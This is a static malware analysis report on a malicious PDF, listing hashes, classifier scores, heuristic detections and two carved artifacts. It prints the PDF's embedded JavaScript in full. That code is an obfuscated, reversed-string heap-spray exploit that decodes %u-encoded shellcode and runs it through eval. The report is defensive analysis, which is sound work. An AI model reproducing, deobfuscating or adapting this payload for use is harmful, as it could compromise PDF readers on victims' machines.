Malicious PDF — malware analysis report

Static analysis result for SHA-256 b7233954d3bf06d3…

MALICIOUS

PDF

69.4 KB First seen: 2026-05-08
MD5: 4e4d4e66a749c10b5b77738f10e3ca67 SHA-1: 6dabbfed6d121219a47ec15ebc45bd4f69903987 SHA-256: b7233954d3bf06d3aed09b4bdbc1a14167a64b0fcce0fe10d8efa49210b7f102
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, etc.) referenced each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3898 bytes
SHA-256: 4279144ff2b40063141df37833201a8a54e34c314db7f12b9d05bc46244426c5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i_ozotlav[4_ozotlav )++i_ozotlav;0f1x0<i_ozotlav;0=i_ozotlav( rof ;)(yarrA wen = 4_ozotlav rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )""(nioj.)" "(tilps."7a14  u % b761  u % 752a  u % bfc6  u % 6770  u % 76ce  u % 4104  u % 745a  u % 213d  u % 6d0c  u % ef99  u % 9864  u % b8c9  u % d665  u % e7cd  u % 355d  u % 08e9  u % d022  u % 0db9  u % 58b7  u % 949a  u % a613  u % a9cc  u % deca  u % 1130  u % 48d9  u % 9032  u % 28d9  u % 37a5  u % 37f0  u % 82c   0  u % 7657  u % 22e9  u % 6b0d  u % 1363  u % 7dfa  u % 06a4  u % 30e8  u % 4a10  u % 739a  u % 3608  u % ab60  u % 8c47  u % b31c  u % f805  u % e458  u % 4ca5  u % 993d  u % c1b5  u % 9c   06  u % 9fbf  u % d05e  u % 9308  u % 072d  u % 1c37  u % f87a  u % 583b  u % 2055  u % aba7  u % a36f  u % 13b4  u % ae7a  u % 1484  u % d5c4  u % d710  u % 98f0  u % c50f  u % 2e04  u % 218c  u % 94bc  u % b089  u % cb07  u % e664  u % cf60  u % 9b9c  u % c37e  u % c8b8  u % d86f  u % 3dcf  u % 262a  u % 2908  u % f63a  u % baf4  u % a334  u % 6dd0  u % 8f1c  u % 6d14  u % 7efe  u % 0ee6  u % e404  u % 7295  u % 4bc2  u % 169a  u % 4374  u % 1ebf  u % 5077  u % 57e6  u % 4352  u % bfb8  u % 3a23  u % 0f37  u % 24b3  u % 38f0  u % 6571  u % 7130  u % 1365  u % 50e5  u % 649d  u % ab9c  u % 424f  u % 9d47  u % 1b33  u % 929c  u % bd6d  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u 
% 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % " (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)